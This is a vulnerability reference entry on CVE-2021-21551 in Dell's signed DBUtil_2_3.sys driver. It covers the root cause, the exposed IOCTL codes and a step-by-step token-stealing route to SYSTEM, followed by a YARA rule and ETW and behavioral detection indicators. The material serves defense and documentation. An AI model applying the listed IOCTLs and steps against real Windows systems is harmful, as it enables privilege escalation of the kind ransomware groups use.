CVE-2021-21551

Dell DBUtil — arbitrary kernel read/write via insufficient IOCTL access control

Summary

Field	Value
Driver	DBUtil_2_3.sys
Vendor	Dell
Vulnerability Class	Arbitrary R/W / IOCTL Access Control
Abused Version	2.3 (shipped with Dell BIOS update utilities)
Status	Blocklisted — included in Microsoft Vulnerable Driver Blocklist
Exploited ITW	Yes

BYOVD Context

• Driver signing: Authenticode-signed by Dell with a valid certificate; accepted by Windows driver signature enforcement
• Vulnerable Driver Blocklist: Included in Microsoft's recommended driver block rules since 2022
• HVCI behavior: Blocked on HVCI-enabled systems via the blocklist; without HVCI, loads normally
• KDU integration: Integrated as a KDU provider
• LOLDrivers: Listed at loldrivers.io with SHA256 hashes and detection rules

Affected IOCTLs

• 0x9B0C1EC4 — Arbitrary virtual memory read
• 0x9B0C1EC8 — Arbitrary virtual memory write
• 0x9B0C1ECC — Arbitrary physical memory read (via MmMapIoSpace)
• 0x9B0C1ED0 — Arbitrary physical memory write (via MmMapIoSpace)
• 0x9B0C1ED4 — MSR read/write

Root Cause

The DBUtil_2_3.sys driver is a kernel component shipped with Dell BIOS update utilities (Dell Command Update, Dell Update, Alienware Update). It provides hardware access for firmware flashing operations. The driver creates a device object (\Device\DBUtil) with a permissive security descriptor that allows any authenticated user to open a handle.

The driver exposes five IOCTL codes that provide direct, unchecked access to kernel virtual memory, physical memory, and CPU MSRs. There is no validation of the caller's privilege level, no address range checks, and no restriction on which memory regions can be accessed. The IOCTLs accept a user-supplied address and size, then perform the read/write operation directly using RtlCopyMemory (for virtual memory) or MmMapIoSpace followed by RtlCopyMemory (for physical memory).

This is not a traditional bug — it is a design-level vulnerability. The driver was designed to give its companion user-mode utility full hardware access, but the lack of any access control means any process on the system can exploit these IOCTLs. Connor McGarr's 5-part blog series provides the definitive analysis.

Exploitation

Exploitation is trivial due to the direct R/W primitive. The attacker:

1. Loads DBUtil_2_3.sys via sc.exe create / sc.exe start or drops it to disk and loads via NtLoadDriver
2. Opens a handle to \\.\DBUtil — accessible to any authenticated user
3. Uses the virtual memory read IOCTL to locate the current process's EPROCESS structure (via PsGetCurrentProcess or by scanning kernel memory)
4. Reads the SYSTEM process token from the EPROCESS linked list
5. Uses the virtual memory write IOCTL to overwrite the current process's token with the SYSTEM token
6. The calling process now runs as SYSTEM

The entire exploit fits in approximately 100 lines of C code. No heap spray, no race condition, no memory corruption — just direct IOCTL calls. Multiple ransomware groups have used this driver in production.

Detection

YARA Rule

rule CVE_2021_21551_DBUtil {
    meta:
        description = "Detects Dell DBUtil_2_3.sys vulnerable driver"
        cve = "CVE-2021-21551"
        author = "KernelSight"
        severity = "critical"
    strings:
        $mz = { 4D 5A }
        $driver_name = "DBUtil" wide ascii nocase
        $device = "\\Device\\DBUtil" wide ascii
        $dell_cert = "Dell Inc" wide ascii
    condition:
        $mz at 0 and $driver_name and ($device or $dell_cert)
}

ETW Indicators

Provider	Event / Signal	Relevance
Microsoft-Windows-Kernel-File	Driver load event	Detects loading of DBUtil_2_3.sys from non-standard paths (temp directories, user-writable locations)
Microsoft-Windows-Security-Auditing	Event 4697 — Service installed	Fires when the driver is registered as a kernel service via sc.exe or NtLoadDriver
Microsoft-Windows-Kernel-Process	Process token modification	Detects runtime token replacement after arbitrary R/W is achieved
Sysmon	Event ID 6 — Driver loaded	Captures driver image path, signature status, and hash for loaded kernel drivers

Behavioral Indicators

• Loading of DBUtil_2_3.sys from a temporary directory, Downloads folder, or user-writable path rather than from Dell's official installation directory
• Rapid sequence of DeviceIoControl calls to \\.\DBUtil performing read and write operations to kernel addresses
• Process privilege escalation from medium to SYSTEM integrity without going through standard elevation mechanisms (UAC, runas)
• Service creation for a kernel driver by a process that is not a Dell update utility

References

• AttackerKB
• Dell Security Advisory DSA-2021-088
• Connor McGarr — Exploit Development Series
• LOLDrivers — DBUtil